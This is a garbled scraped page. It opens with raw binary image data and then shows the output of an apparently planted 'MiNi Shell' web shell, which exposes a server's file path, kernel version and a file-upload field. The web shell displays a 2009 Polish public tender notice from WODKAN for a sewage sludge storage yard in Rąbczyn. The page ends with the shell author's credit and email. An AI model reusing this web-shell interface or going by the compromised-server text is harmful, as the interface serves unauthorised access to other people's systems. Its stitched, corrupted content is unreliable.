JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090720/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090720/245946-N-2009.html

<p class="kh_header"><b>Ostrów Wielkopolski: Budowa magazynu ustabilizowanych osadów ściekowych na terenie Oczyszczalni Ścieków w Rąbczynie</b><br>
<b>Numer ogłoszenia: 245946 - 2009; data zamieszczenia: 20.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> WODKAN Przedsiębiorstwo Wodociągów i Kanalizacji S.A. , ul. Partyzancka 27, 63-400 Ostrów Wielkopolski, woj. wielkopolskie, tel. 062 7387705, 7387706, faks 062 7353690.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wodkan.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: sektor wodny.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa magazynu ustabilizowanych osadów ściekowych na terenie Oczyszczalni Ścieków w Rąbczynie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje:
Budowę magazynu ustabilizowanych osadów ściekowych na terenie Oczyszczalni Ścieków  w Rąbczynie
1. branża architektoniczna
1.1 całkowita powierzchnia płyty magazynu osadu 2200 m2, w tym :
    - część odkryta 1300 m2,
    - część zadaszona 680 m2,
    - część komunikacyjna 220m2,
1.2 powierzchnia zjazdu - 379 m2, 
1.3 wysokość wiaty w świetle - 6 m,
1.4 w skład całego założenia poza częściowo zadaszoną płytą magazynową wchodzą : otwarta myjka samochodów, szafka energetyczna, zjazd do magazynu, przepompownia wód odciekowych wraz z osadnikiem,
2. branża konstrukcyjna
2.1 płyta magazynowa żelbetowa, monolityczna ze ścianami oporowymi na obwodzie, częściowo zagłębiona w istniejącym gruncie oraz częściowo zakryta wiatą o konstrukcji stalowej słupkowo - kratowej w rozstawie 10,5 m i rozpiętości 17,5m,
2.2 płyta żelbetowa grubości 25 cm z betonu C25(30 ( B30) wodoszczelnego W-6, zbrojonego stalą A-II,  zdylatowana na całej wysokości, 
2.3 podbudowa pod płytą składa się z : 2 warstw folii budowlanej, podbetonu C8(10 (B10) 15 cm, kruszywa naturalnego stabilizowanego cementem 15 cm, podsypki piaskowej zagęszczonej (Is>0,98) 15 cm,  
2.4 wiata posadowiona na żelbetowych stopach fundamentowych z betonu C25(30 (B30) wodoszczelnego W-6, zbrojonego stalą A-II, o wymiarach 3m x3 m,
2.5 ściany płyty magazynowej żelbetowe z betonu C25(30 (B30) wodoszczelnego W-6, zbrojonego stalą A-II, zdylatowane, grubości 25 cm w koronie i 75 cm w podstawie, posadowione na fundamencie grubości 50 cm i szerokości 180 cm, 
2.6 dach wiaty płatwiowy z poszyciem z blachy fałdowej grubości 0,5 mm ze stali S250GD + Z275, 
3. branża drogowa
3.1. projektuje się zjazd do magazynu osadów z wewnętrznej drogi technologicznej wraz z systemem ścian oporowych utrzymujących skarpy oraz z odwodnieniem,
3.2. nawierzchnia wykonana z betonu cementowego klasy C25(30 i grubości 25 cm,
3.3. podbudowa pod nawierzchnię  składa się z : 2 warstw foli budowlanej, podbeton C8(10 (B10) 15 cm, grunt stabilizowany cementem 15 cm, podsypka piaskowa 15 cm, 
3.4 odwodnienie nawierzchni poprzez ściek przykrawężnikowy a następnie do wpustów kanalizacji odciekowej, 
4. branża sanitarna
4.1. zasilanie w wodę z wodociągu:
4.1.1 sieć wykonana z rur PE 80 średnicy 63 mm i długości 121,5 m,
4.1.2 włączenie do istniejącej sieci wodociągowej,
4.1.3 przedstawienie pozytywnego badania bakteriologicznego wody,
4.2. zasilanie w wodę technologiczną :
4.2.1 sieć wykonana z rur PE 80 średnicy 90 mm i długości 170,5 m, 
4.2.2 montaż hydrantu nadziemnego DN80 (typu AVK, Hawle) z żeliwa sferoidalnego min.GGG40 wg DIN 1693, ochrona antykorozyjna zewnętrzna i wewnętrzna farbą proszkową na bazie żywicy epoksydowej min. 250 um wg DIN 30677 z obudową, skrzynką żeliwną  i znakiem informacyjnym kpl. 1, wraz z zasuwą odcinającą DN 80 z obudową, skrzynką żeliwną  i znakiem informacyjnym - kpl. 2,
4.2.3 montaż zasuwy kołnierzowej DN 80 mm ( typ AVK, Hawle ) z żeliwa sferoidalnego ( minGGG40) malowanego farbą  epoksydową ( grubość powłoki ochronnej min. 250 um) wg DIN 30677, długość zabudowy krótka F4, klin z żeliwa sferoidalnego nawulkanizowany zewnętrznie i wewnętrznie powłoką EPDM  lub NBR, z obudową, skrzynką żeliwną  i znakiem informacyjnym - kpl. 1,
W zakresie zadań z pkt. 4.1 i 4.2 : wykonanie prób szczelności sieci wodociągowej, wykonanie dokumentacji fotograficznej w wersji elektronicznej, o rozdzielczości co najmniej 3Mpiksele wszystkich wykonanych węzłów wodociągowych (między innymi: zasuwy, hydranty, bloki  oporowe) i przekazanie ich w dniu odbioru zamawiającemu oraz w formie zdjęć ( nazwy poszczególnych zdjęć, plików  zgodnie z dokumentacją budowlaną, na podstawie której wykonywane były  przedmiotowe węzły),
4.3. kanalizacja odciekowa grawitacyjna i tłoczna - wprowadzająca ścieki do podczyszczenia na Oczyszczalnię Ścieków w Rąbczynie.
4.3.1 kanał grawitacyjny wykonany z rur PVC-U średnicy 200x5,9mm i długości 40m oraz z rur PVC-U średnicy 160x4,7mm i długości 23m,
4.3.2 rurociąg tłoczny z rur PE średnicy 63mm i długości 116m, 
4.3.3 montaż przepompowni ścieków FLYGT PS 120-C-290 P lub równoważnej ,
4.3.4 montaż studzienki kanalizacyjnej PCV fi 315mm z osadnikiem, zamkniętej rurą teleskopową z włazem żeliwnym zatrzaskowym okrągłym D400 z umocnieniem włazu pierścieniem żelbetowym-6 szt,
4.3.5 montaż wpustów ulicznych żeliwnych - 6 szt,
4.3.6 wykonanie prób szczelności  kanalizacji odciekowej,
4.3.7 wykonanie monitoringu powykonawczego kanalizacji odciekowej po czyszczeniu hydrodynamicznym ( opis nr studni musi zgadzać się z opisem nr podanym w projekcie ),
4.3.8 wykonanie 4 otworów piezometrycznych wokół magazynu osadów,
5. branża elektryczna
5.1 zasilanie linią kablową zalicznikową z istniejącej rozdzielni R-19 kablem typu YKY 5x35mm2,
5.2 montaż dwóch rozdzielnic w szafie wolnostojącej z zabudową modułową,
5.3 wykonanie instalacji oświetlenia, gniazd wtyczkowych, instalacji ochrony od porażeń oraz instalacji odgromowej,
5.4 wykonanie pomiarów instalacji elektrycznej,
oraz :
- przygotowanie i zabezpieczenie, z zachowaniem najwyższej staranności terenu budowy,
- opracowanie planu bezpieczeństwa i ochrony zdrowia uwzględniającego specyfikę obiektu budowlanego i warunki prowadzenia robót,
- niezbędne zabezpieczenia p.poż., bhp,
- ubezpieczenie z zakresu odpowiedzialności materialnej i cywilnej z tytułu prowadzonych robót,
- zapewnienie właściwego nadzoru nad przestrzeganiem przepisów związanych z realizacją przedmiotu zamówienia,
- uczestnictwo w naradach koordynacyjnych,
- ponoszenie kosztów wszelkich mediów zewnętrznych (energia elektryczna, woda, gaz, łączność), 
- ponoszenie kosztów wszelkich odwodnień terenu budowy celem prawidłowej i bezpiecznej realizacji robót objętych przedmiotem zamówienia,
- bieżące usuwanie, składowanie i ewentualną utylizację materiałów rozbiórkowych i  powstałych odpadów,
- przedstawienie, zgodnie z normą PN EN 206-1:2003 - Beton wymagania, właściwości, produkcja i zgodność, wyniku badań laboratoryjnych próbek betonu z płyty magazynowej i drogi,
- kompleksowa obsługa geodezyjna wraz z pełną dokumentacją powykonawczą robót,
- przekazanie Zamawiającemu dokumentacji powykonawczej wraz z dokumentami pozwalającymi  na ocenę prawidłowego wykonania robót zgłoszonych do odbioru,
- zgłoszenie przedmiotu umowy do odbioru oraz uczestnictwo w czynnościach odbiorowych,
- pisemne zapewnienie o usunięciu stwierdzonych wad..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.22.30.00-6, 45.21.32.80-9, 45.26.11.00-5, 45.23.32.26-9, 45.23.13.00-8, 45.31.53.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Każdy Wykonawca zobowiązany jest zabezpieczyć swą ofertę wadium w wysokości:
30.000 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Wykonawca ubiegający się o udzielenie zamówienia publicznego musi spełniać niżej wymienione warunki udziału w postępowaniu:
1) posiadać uprawnienia do wykonywania działalności lub czynności w zakresie odpowiadającym przedmiotowi zamówienia  oraz nie podlegać wykluczeniu na podstawie art. 24 ustawy. W celu potwierdzenia spełniania niniejszego warunku Wykonawca zobowiązany jest przedłożyć następujące dokumenty (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich):
a) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
b) aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert ;
c) aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, lub
d) aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
2) posiadać niezbędną wiedzę i doświadczenie oraz wykazać się dysponowaniem potencjałem technicznym  i osobami zdolnymi do wykonania niniejszego zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępniania potencjału technicznego i osób zdolnych do wykonania zamówienia. W szczególności Wykonawca musi spełniać następujące warunki (w przypadku  wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny i kadrowy oraz łączne kwalifikacje i doświadczenie):
a) wykonać w okresie ostatnich 5 lat przed dniem wszczęcia postępowania a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej:
- dwie roboty budowlane polegające na wykonaniu szczelnych płyt, placów, magazynów betonowych o powierzchni co najmniej 1500 m2 i wraz ze stalową konstrukcją zadaszenia o powierzchni co najmniej 500 m2 , lub
- dwie roboty budowlane polegające na wykonaniu szczelnych płyt, placów, magazynów betonowych o powierzchni co najmniej 1500 m2 i dwie roboty budowlane polegające na wykonaniu stalowej konstrukcji zadaszenia o powierzchni co najmniej 500 m2.
W celu potwierdzenia spełniania niniejszego warunku Wykonawca zobowiązany jest przedłożyć wykaz wykonanych robót sporządzony według wzoru stanowiącego załącznik nr 6 do niniejszej IDW oraz dokumenty potwierdzające, że roboty te zostały wykonane należycie.
Zaleca się, aby przedkładane dokumenty  potwierdzające, że wykonane przez Wykonawcę roboty zostały wykonane należycie, zawierały, co najmniej:
a. wskazanie, że Wykonawca składający ofertę w niniejszym postępowaniu realizował      roboty, których dokumenty dotyczą;
b. wskazanie podmiotu, na rzecz którego realizowane były roboty;
c. wskazanie zakresu robót;
d. wskazanie wartości robót;
e. wskazanie daty wykonania (rozpoczęcia i zakończenia);
f. wskazanie miejsca wykonania; 
g. opinię podmiotu wskazanego w pkt. b. stwierdzającą, że roboty zostały wykonane należycie;
W przypadku złożenia przez Wykonawcę dokumentów zawierających dane w innych
walutach niż PLN, Zamawiający wartość robót przeliczy na PLN wg kursu średniego NBP z dnia ukazania się ogłoszenia dotyczącego niniejszego zamówienia.
b) posiadać przeciętne zatrudnienie w okresie ostatnich 3 lat tj. od 01.07.2006r.    do 30.06.2009r., a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, w ilości minimum 15 pracowników; w celu potwierdzenia spełniania niniejszego warunku Wykonawca zobowiązani są przedłożyć informację na temat przeciętnej liczby zatrudnionych pracowników sporządzoną według wzoru stanowiącego załącznik nr 3     do niniejszej IDW;
c) posiadać przeciętną liczebność personelu kierowniczego w okresie ostatnich 3 lat tj. 01.07.2006r. do 30.06.2009r a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, w ilości 2 osoby ; w celu potwierdzenia spełniania niniejszego warunku Wykonawca zobowiązani są przedłożyć informację na temat przeciętnej liczebności personelu kierowniczego sporządzoną według wzoru stanowiącego załącznik nr 4 do niniejszej IDW, 
d) dysponują wykazem osób, które mogą pełnić funkcję kierownika budowy oraz kierowników robót, przy realizacji niniejszego zamówienia wraz  z informacjami na temat ich kwalifikacji zawodowych, wykształcenia i doświadczenia,  niezbędnych do wykonania zamówienia, a także zakresu wykonywania przez nich czynności: 
- wymagania konieczne dotyczące kierownika budowy - niniejsza osoba ma posiadać uprawnienia  budowlane w specjalności konstrukcyjno - budowlanej,
- wymagania konieczne dotyczące kierownika robót w zakresie branży drogowej -  niniejsza osoba ma posiadać uprawnienia  budowlane w specjalności drogowej,
- wymagania konieczne dotyczące kierownika robót w zakresie branży sanitarnej - 
niniejsza osoba ma posiadać uprawnienia  budowlane w specjalności instalacyjno -
inżynieryjnej w zakresie sieci wodno - kanalizacyjnych,
 - wymagania konieczne dotyczące kierownika robót w zakresie branży elektrycznej - niniejsza osoba ma posiadać uprawnienia  budowlane w specjalności instalacyjno - inżynieryjnej w zakresie instalacji elektrycznych i elektroenergetycznych,
W celu potwierdzenia spełniania niniejszego warunku Wykonawca  zobowiązany      jest przedłożyć: wykaz sporządzony według wzoru stanowiącego załącznik nr 5      do niniejszej IDW, oraz przedłożyć kserokopię stwierdzenia przygotowania zawodowego do pełnienia samodzielnej funkcji technicznych w budownictwie wraz z zaświadczeniem o przynależności  do  właściwej okręgowej izby samorządu zawodowego;
3) znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie niniejszego zamówienia. W szczególności Wykonawca musi spełniać następujące warunki (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców  o udzielenie niniejszego zamówienia, oceniana będzie ich łączna sytuacja ekonomiczna i finansowa - w tym celu dokumenty ma obowiązek złożyć ten lub  ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie tego warunku): 
a) posiadać środki finansowe lub zdolność kredytową w wysokości co najmniej 1.500.000 zł.  W celu potwierdzenia spełniania niniejszego warunku Wykonawca  zobowiązany jest przedłożyć informację z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, w którym posiadają rachunek, potwierdzające posiadanie środków finansowych w wymaganej wysokości lub posiadanie przez Wykonawcę zdolności kredytowej w wymaganej  wysokości,  
b) posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności w wysokości co najmniej 2.000.000 zł. W celu potwierdzenia spełniania niniejszego warunku Wykonawca musi złożyć polisę a w przypadku jej braku inny dokument potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oświadczenia i dokumenty określone zostały w SIWZ.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.wodkan.com.pl - dział przetargi.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> WODKAN Przedsiębiorstwo Wodociągów i Kanalizacji S.A. w Ostrowie Wielkopolskim 
ul. Partyzancka 27, 63-400 Ostrów Wielkopolski godziny urzędowania 7.00-15..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.08.2009 godzina 10:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego : WODKAN Przedsiębiorstwo Wodociągów i Kanalizacji S.A. ul. Partyzancka 27, pokój 20 -  Sekretariat Spółki ,.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com